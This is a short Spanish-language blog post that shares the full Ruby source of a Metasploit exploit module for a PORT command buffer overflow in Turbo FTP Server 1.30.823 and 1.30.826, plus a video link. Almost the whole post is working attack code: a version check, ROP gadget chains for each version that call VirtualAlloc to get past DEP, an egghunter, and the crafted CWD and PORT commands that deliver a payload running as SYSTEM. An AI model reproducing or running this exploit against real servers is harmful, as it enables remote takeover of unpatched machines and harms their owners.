Hoy os traemos un módulo de tipo exploit para Metasploit. La aplicación vulnerable es Turbo FTP Server. Os dejamos el código fuente (ruby) del módulo y un video que ayuda a la explotación.
### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and terms of use.# http://metasploit.com/##
require 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = GreatRankinginclude Msf::Exploit::Remote::Ftpinclude Msf::Exploit::Remote::Egghunterdef initialize(info = {})super(update_info(info,'Name' => 'Turbo FTP Server 1.30.823 PORT Overflow','Description' => %q{This module exploits a buffer overflow vulnerability found in the PORTcommand in Turbo FTP Server 1.30.823 & 1.30.826, which results in remotecode execution under the context of SYSTEM.},'Author' =>['Zhao Liang', #Initial Descovery'Lincoln', #Metasploit'corelanc0d3r', #Metasploit'thelightcosine' #Metasploit],'License' => MSF_LICENSE,'Platform' => [ 'win' ],'References' =>[[ 'OSVDB', '85887' ]],'Payload' =>{'BadChars' => "\x00",'EncoderType' => Msf::Encoder::Type::AlphanumMixed,'EncoderOptions' => { 'BufferRegister' => 'EDI' }},'Targets' =>[[ 'Automatic', {} ],['Windows Universal TurboFtp 1.30.823',{'Ret' => 0x00411985, # RETN (ROP NOP) [tbssvc.exe]'ver' => 823},],[ 'Windows Universal TurboFtp 1.30.826',{'Ret' => 0x004fb207, # RETN (ROP NOP) [tbssvc.exe]'ver' => 826},],],'DisclosureDate' => 'Oct 03 2012','DefaultTarget' => 0))enddef checkconnectdisconnectif (banner =~ /1\.30\.823/)return Exploit::CheckCode::Vulnerableelsif (banner =~ /1\.30\.826/)return Exploit::CheckCode::Vulnerableendreturn Exploit::CheckCode::Safeenddef create_rop_chain(ver)# rop chain generated with mona.py - www.corelan.beif ver == 823rop_gadgets =[0x004b692a, # POP ECX # RETN [tbssvc.exe]0x005f6074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]0x0046f82a, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]0x00423b95, # XCHG EDX,EDI # RETN [tbssvc.exe]0x00423a27, # XCHG ESI,EDI # RETN [tbssvc.exe]0x005d1c99, # POP EBP # RETN [tbssvc.exe]0x004cad5d, # & jmp esp [tbssvc.exe]0x004ab16b, # POP EBX # RETN [tbssvc.exe]0x00000001, # 0x00000001-> ebx0x005ef7f6, # POP EDX # RETN [tbssvc.exe]0x00001000, # 0x00001000-> edx0x005d7139, # POP ECX # RETN [tbssvc.exe]0x00000040, # 0x00000040-> ecx0x004df1e0, # POP EDI # RETN [tbssvc.exe]0x00411985, # RETN (ROP NOP) [tbssvc.exe]0x00502639, # POP EAX # RETN [tbssvc.exe]0x90909090, # nop0x00468198, # PUSHAD # RETN [tbssvc.exe]].flatten.pack("V*")elsif ver == 826rop_gadgets =[0x0050eae4, # POP ECX # RETN [tbssvc.exe]0x005f7074, # ptr to &VirtualAlloc() [IAT tbssvc.exe]0x004aa7aa, # MOV EDX,DWORD PTR DS:[ECX] # SUB EAX,EDX # RETN [tbssvc.exe]0x00496A65, # XOR EAX,EAX [tbssvc.exe]0x004badda, # ADD EAX,EDX # RETN [tbssvc.exe]0x00411867, # XCHG EAX,ESI # XOR EAX,EAX # POP EBX # RETN [tbssvc.exe]0x00000001, # 0x00000001-> ebx0x0058a27a, # POP EBP # RETN [tbssvc.exe]0x004df7dd, # & call esp [tbssvc.exe]0x005f07f6, # POP EDX # RETN [tbssvc.exe]0x00001000, # 0x00001000-> edx0x004adc08, # POP ECX # RETN [tbssvc.exe]0x00000040, # 0x00000040-> ecx0x00465fbe, # POP EDI # RETN [tbssvc.exe]0x004fb207, # RETN (ROP NOP) [tbssvc.exe]0x00465f36, # POP EAX # RETN [tbssvc.exe]0x90909090, # nop0x004687ff, # PUSHAD # RETN [tbssvc.exe]].flatten.pack("V*")endreturn rop_gadgetsenddef exploitmy_target = targetif my_target.name == 'Automatic'print_status("Automatically detecting the target")connectdisconnectif (banner =~ /1\.30\.823/)my_target = targets[1]elsif (banner =~ /1\.30\.826/)my_target = targets[2]endif (not my_target)print_status("No matching target...quiting")returnendtarget = my_targetendprint_status("Selected Target: #{my_target.name}")connect_loginrop_chain = create_rop_chain(target['ver'])rop = rop_chain.unpack('C*').join(',')eggoptions ={:checksum => true,:eggtag => 'w00t',:depmethod => 'virtualalloc',:depreg => 'esi'}badchars = "\x00"hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)speedupasm = "mov edx,eax\n"speedupasm << "sub edx,0x1000\n"speedupasm << "sub esp,0x1000"speedup = Metasm::Shellcode.assemble(Metasm::Ia32.new, speedupasm).encode_stringfasterhunter = speedupfasterhunter << hunterprint_status("Connecting to target #{target.name} server")buf1 = rand_text_alpha(2012)buf1 << eggbuf1 << rand_text_alpha(100)buf2 = rand_text_alpha(4).unpack('C*').join(',')buf2 << ","buf2 << [target['Ret']].pack("V").unpack('C*').join(',') #eipbuf2 << ","buf2 << ropbuf2 << ","buf2 << fasterhunter.unpack('C*').join(',')buf2 << ","buf2 << rand_text_alpha(90).unpack('C*').join(',')send_cmd( ['CWD', buf1], true );send_cmd( ['PORT', buf2], true );print_status("Egghunter deployed, locating shellcode")handlerdisconnectendend
VIDEO:
[youtube aW0jfcXKQk8 nolink]
No hay comentarios:
Publicar un comentario